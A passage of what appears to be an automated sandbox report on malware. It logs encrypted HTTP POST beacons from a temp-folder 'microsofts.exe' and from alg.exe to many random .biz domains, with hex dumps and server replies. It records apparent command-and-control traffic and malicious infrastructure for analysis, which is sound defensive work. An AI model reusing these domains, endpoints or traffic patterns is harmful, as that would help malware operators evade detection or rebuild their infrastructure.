                                                                                                                                                                                                                                                                                                                                                                                                              Host: dwrqljrr.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 828
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:45.253686905 CET828OUTData Raw: 1a d8 78 79 84 2c 0c 56 30 03 00 00 58 05 4f cc e2 1b 4d 4f 76 9d 95 e1 80 55 0b 83 fe a7 86 c8 11 1d 3b 14 09 46 18 a8 b8 46 72 bc 3a c1 49 a8 99 8c 52 9e c7 d6 c3 f7 64 49 e7 df 99 59 5e 64 e7 80 b7 09 d1 a7 5f 25 f6 66 44 83 df 27 70 ec 89 5f
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: xy,V0XOMOvU;FFr:IRdIY^d_%fD'p_sK8:a|QiIrb'epn&e.>;?10}a nbEE;<dl|uD}|2eapB.8>=w$gY{'(jZUK+4
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:46.098514080 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:03:45 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=8ac1c596a1fad96e084cea5f1a96fc3e|173.254.250.76|1730822625|1730822625|0|1|0; path=/; domain=.dwrqljrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              58192.168.2.55968018.141.10.107801492C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:46.004925966 CET349OUTPOST /boysd HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: acwjcqqv.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:46.004947901 CET778OUTData Raw: 05 07 3d dc 6a ed 90 12 fe 02 00 00 24 73 11 31 7a 29 b4 94 ef 2d f7 18 78 75 66 08 aa 92 83 ef c1 42 3a bf 32 89 65 fe 00 49 5d 38 cb 5f 58 58 dc 53 b8 10 af 24 37 69 a1 80 3e 32 fd 90 85 da 85 b7 90 ce 65 b1 6b 28 32 74 1f d8 35 69 53 c7 a4 9c
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: =j$s1z)-xufB:2eI]8_XXS$7i>2ek(2t5iSnS{ox#)up:Cgq:/.uQl5Gb`gJ)%m&3XpM+26*axvx^bE?cqLo?KHA`w8HBz3{i
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:47.453851938 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:03:47 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=f806e31b64f283494e2e8966f66ea62a|173.254.250.76|1730822627|1730822627|0|1|0; path=/; domain=.acwjcqqv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              59192.168.2.55968135.164.78.200801816C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:46.141329050 CET353OUTPOST /eoodskndsap HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: nqwjmb.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 828
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:46.141366959 CET828OUTData Raw: ca 4b c1 63 9f f1 96 c4 30 03 00 00 3e c1 f0 e4 e1 b0 04 1b e3 20 ed b5 7d 09 51 40 f2 b5 8f af 6f 26 19 3f 6a 9e 8c f4 1c cc 38 bf eb 3a c6 6f 46 77 f9 b3 22 aa 46 07 35 99 f3 43 43 c3 6b e6 b5 06 d6 64 e7 84 88 24 ac 5a 25 12 f7 cc cc 59 5e 6c
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: Kc0> }Q@o&?j8:oFw"F5CCkd$Z%Y^lA*ABB[~VIF,4QN,[Q1&E/^1*<.7-c"xr1q/9n 1cq1-c{J"7\g"+J'I5&
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:46.959660053 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:03:46 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=1e3a3b2cd92cd16f2806edf851d6485b|173.254.250.76|1730822626|1730822626|0|1|0; path=/; domain=.nqwjmb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              60192.168.2.5596873.94.10.34801816C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:47.010684013 CET358OUTPOST /ccgjbojtfwpjh HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: ytctnunms.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 828
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:47.010766983 CET828OUTData Raw: 1c be f8 98 bc 77 47 7f 30 03 00 00 ad a2 bf ac ad e3 3e a2 c9 7e 12 11 fd 2a 7a 9a c4 f3 4d 7e f4 b5 24 e0 73 12 a5 18 da e3 ec db b4 9b 51 d3 ef 77 bc a1 61 be d9 7d ff 17 5b ba 5e fe e9 ca c1 ab df 38 95 3a 02 ba d1 cf 76 86 2a f3 c3 72 e0 cc
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: wG0>~*zM~$sQwa}[^8:v*r5VR$>F'Q+p&AJuMP9RTX9=W)bq4)*(!1un'EHgiyZ@@N$=Y3!=]]MD>NwIAcUpC,&fDxn/
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:47.691274881 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:03:47 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=b9ae4358c18fe369ae0ccc2308bc8033|173.254.250.76|1730822627|1730822627|0|1|0; path=/; domain=.ytctnunms.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              61192.168.2.55969118.246.231.120801492C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:47.698206902 CET351OUTPOST /tqpwjhvmbc HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: vyome.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:47.698240042 CET778OUTData Raw: 07 8a 6e 2b a7 46 a0 9e fe 02 00 00 a9 0f ce 24 da 49 70 a9 b3 7d 61 55 66 a7 0b 6d 0c b4 a3 77 c5 db c7 78 ac f9 7e 2f 12 27 2d d7 a4 dd 75 02 e2 ee 78 a4 0d 00 73 6a 69 89 70 85 81 6e 6d 44 37 63 7b e1 60 14 37 54 84 d3 a9 e0 66 4b 1e 67 92 b5
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: n+F$Ip}aUfmwx~/'-uxsjipnmD7c{`7TfKgl=?:'_u3mINlL%z2?Z<##,tfHYx}w05e1k&Ji-\LsnJs#<3w_]$p*;1$g_[#
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:48.549619913 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:03:48 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=ee7a1b3df35328cb68bb12c4f759f00c|173.254.250.76|1730822628|1730822628|0|1|0; path=/; domain=.vyome.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              62192.168.2.559693165.160.13.20801816C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:47.760854006 CET345OUTPOST /couv HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: myups.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 828
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:47.760989904 CET828OUTData Raw: a3 82 61 00 5e c8 6b 8d 30 03 00 00 38 45 fd 12 a0 b1 14 07 8f f6 5f 30 01 5e 65 d4 c6 6c ba d9 37 44 e0 af 8f 88 be 3e cf 4e df be ef 92 0a ea 13 47 ea df 20 fe 6d c9 11 92 b5 40 0f 0a 8b 67 6d 9f a2 9a cf ea 56 3f 98 f8 08 09 49 53 0f 6b 00 1c
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: a^k08E_0^el7D>NG m@gmV?ISkJ`ckzZ^pk:WDvP`VjC[0n(JFpcu#Pp6U?']H#|]qCgutKa<}bQhq%#hBfQ#%C
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:48.567636013 CET170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:03:48 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 94
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 2e 31 2e 37 22 20 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: <html><head><title></title><meta name="revised" content="1.1.7" /></head><body></body></html>


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              63192.168.2.559698165.160.13.20801816C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:48.632597923 CET343OUTPOST /wa HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: myups.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 828
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:48.632626057 CET828OUTData Raw: 21 f1 44 f6 0e a9 e6 f9 30 03 00 00 09 29 79 21 00 27 3d 8e f5 c8 74 89 93 05 72 73 e3 8a 6d e7 4b 3c 22 03 b7 10 1a b1 a4 70 5d 0d 53 bb 02 f7 34 03 fa 3c 60 17 c9 67 32 5a 0f dd 8f eb e7 69 9f c0 80 1e 90 43 c1 3b 1e da fe 73 ca e8 99 46 6c 98
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: !D0)y!'=trsmK<"p]S4<`g2ZiC;sFlZ_@3P"MJJ*iea&HM'(T!>6Vu4oeGs!L_j\7MkY"7]DM3*&Ds@cd85 {Ac e=K;
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:49.436620951 CET170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:03:49 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 94
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 2e 31 2e 37 22 20 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: <html><head><title></title><meta name="revised" content="1.1.7" /></head><body></body></html>


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              64192.168.2.55970118.208.156.248801492C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:48.908615112 CET354OUTPOST /nmtgacidyy HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: yauexmxk.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:48.908642054 CET778OUTData Raw: ab 0e 71 d1 88 91 d8 11 fe 02 00 00 14 07 54 bd 2f 80 9a bb 67 8f 8d a2 cb 55 e3 e5 3c 60 52 dd d0 54 d0 d5 67 74 3a 50 d0 2e 94 82 71 35 32 3f 86 96 7a 27 37 8b cb d1 e8 cc 3a 3e 53 8c 85 f1 ce 9c 56 e0 37 28 a5 d7 8d af ed d2 59 bb 34 7b 72 ad
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: qT/gU<`RTgt:P.q52?z'7:>SV7(Y4{rnc,ZYsUj)xDyOEFCt 2l -&tqUrs$KuDEz'3B+T=jaFl"]]<8cNSd\`)YX"qg|u@*aV{
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:49.581597090 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:03:49 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=bd0acfdae82580ba2637ae47e28ee200|173.254.250.76|1730822629|1730822629|0|1|0; path=/; domain=.yauexmxk.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              65192.168.2.55970554.244.188.177801816C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:49.503246069 CET349OUTPOST /dkbm HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: oshhkdluh.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 828
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:49.503273964 CET828OUTData Raw: 23 7d 0e ea 5c e4 dd ae 30 03 00 00 a8 31 0d 3d be 4e a3 87 0b 5c da 14 d6 c0 ba e7 17 c2 b4 48 72 a1 b0 88 0a 89 f0 00 53 e0 ff 78 46 fd df c6 ef db b3 50 25 6f 09 b9 a1 cb bf 87 16 e9 22 c4 a0 6a e2 27 6b 7e 53 9c e7 75 02 d1 18 c7 e7 0f 31 dc
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: #}\01=N\HrSxFP%o"j'k~Su1e:uQ.ptNV1]>G|eQ4~#}/64rJ5?!=wF>7=[G1qG3wl_J.oW1Ef|\zDOblb>[(5|
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:50.342863083 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:03:50 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=8617e0bb451f90aeb2821df5527af9ba|173.254.250.76|1730822630|1730822630|0|1|0; path=/; domain=.oshhkdluh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              66192.168.2.55970813.251.16.150801492C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:49.841599941 CET351OUTPOST /ghraajhdo HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: iuzpxe.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:49.841625929 CET778OUTData Raw: 1e 15 fa 21 96 29 8e 2e fe 02 00 00 e8 4a c7 5d 7f 2b 8e d1 08 62 45 25 27 a7 17 bc 49 f9 1f a9 ad d9 6f 67 9f cb 5b 19 e7 6a 2e 58 1d e6 75 c5 38 08 5c 2f 77 51 30 34 33 98 ae b9 6c 53 34 48 8e 11 d7 66 15 ed 84 49 5b d4 5c cc 29 da 2f 8e f0 9a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: !).J]+bE%'Iog[j.Xu8\/wQ043lS4HfI[\)/r3kyV|'ew]+$m9uIeG55=bl=QUsSj%|1)8<]e[B_ca"l$fl0]L++N]bgGL+wh
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:51.279618025 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:03:51 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=1f4320a83f214729d52b5385917d5b07|173.254.250.76|1730822631|1730822631|0|1|0; path=/; domain=.iuzpxe.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              67192.168.2.559713208.100.26.245801816C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:50.499032021 CET358OUTPOST /ubujpwkxvgqviqf HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: yunalwv.biz
